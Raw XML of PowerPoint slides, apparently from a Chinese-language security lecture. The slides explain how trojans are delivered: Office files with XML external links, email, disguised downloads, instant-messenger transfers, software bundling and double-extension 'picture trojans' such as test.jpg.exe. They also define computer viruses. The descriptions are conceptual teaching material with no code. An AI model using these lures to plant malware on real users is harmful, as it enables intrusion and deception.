        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="709613" y="1762125"/>
            <a:ext cx="7800975" cy="3752850"/>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1100138" y="1176338"/>
            <a:ext cx="6918008" cy="4586288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="985838" y="5781676"/>
            <a:ext cx="7003733" cy="73723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p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>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028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="10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CEEA532-22DC-4355-9369-1302E21927FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件样本不利用漏洞，也未包含可疑的宏或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等操作，而是单纯的利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接外部开启另一个恶意文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF6657A0-995A-4DD6-8AFB-4413AD565BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8DDA540-6EC3-4F0B-8CD5-2AB94970C070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3083054"/>
            <a:ext cx="7915275" cy="3000375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9377423-B090-41DB-94F1-56E1B1BD878E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757237" y="1890633"/>
            <a:ext cx="7772400" cy="2692608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3440208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86C920B-1662-459F-ADC6-0CFB72DC8FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A997EBD6-D4C3-4904-A88F-F5729C1D45CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用电子邮件植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E3BC3B-E704-4A8B-BE1E-BD1B61B04E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192213" y="1925638"/>
            <a:ext cx="6705600" cy="3743325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35605872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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）网络下载植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55302" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582613" y="1306513"/>
            <a:ext cx="7772400" cy="4779962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>一些非正规的网站以提供软件下载为名，将木马程序伪装成用户所希望的其它软件，当用户下载安装时，实际上所安装的是木马程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用即时通工具植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345144" y="1376472"/>
            <a:ext cx="8026345" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通工具有文件传输功能，所以现在也有很多木马通过它传播。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者通常把木马服务器程序通过合并软件和其他的可执行文件绑在一起，然后骗你说是一个好玩的东东或者是漂亮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的照片，你接受后运行的话，你就成了木马的牺牲品了。</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E86D20D-A32A-4211-9A41-504ED2475AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675481" y="1311639"/>
            <a:ext cx="7793037" cy="4804348"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>赛门铁克</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Peter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Szor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>给出定义：计算机病毒是一种计算机程序，它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>递归地、明确地复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>自己或其演化体。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>“明确递归”来区别病毒与正常程序的复制过程，“递归”反映了一个文件在被病毒感染以后会进一步感染其他文件，“明确”强调了自我复制是病毒的主要功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B438E614-54EE-4B28-91FB-3C40D1B9AD99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10799927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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）与其它程序或文档捆绑</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601663" y="1325562"/>
            <a:ext cx="7772400" cy="4579937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将木马与其它软件捆绑，用户在下载安装其它软件时就不自觉地也安装了木马，这种情况下用户很难察觉。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者还可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.mpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等文件中插入恶意代码，当用户打开这些文档时，就会被植入木马。</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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60419">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60419">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60419">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60419">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60419">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60419">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604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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例：图片木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61446" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="1430338"/>
            <a:ext cx="7704137" cy="4618037"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>图片木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，利用用户认为图片文件不可执行，因此不可能是木马这样的心理来欺骗受害者。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实际上这是一个后缀名的小把戏。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统默认不显示已经注册了的文件类型的后缀名，因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>test.jpg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这种文件在系统上就显示为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，木马再采用和图片文件一样的图标，对大多数用户而言，是极具欺骗性的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
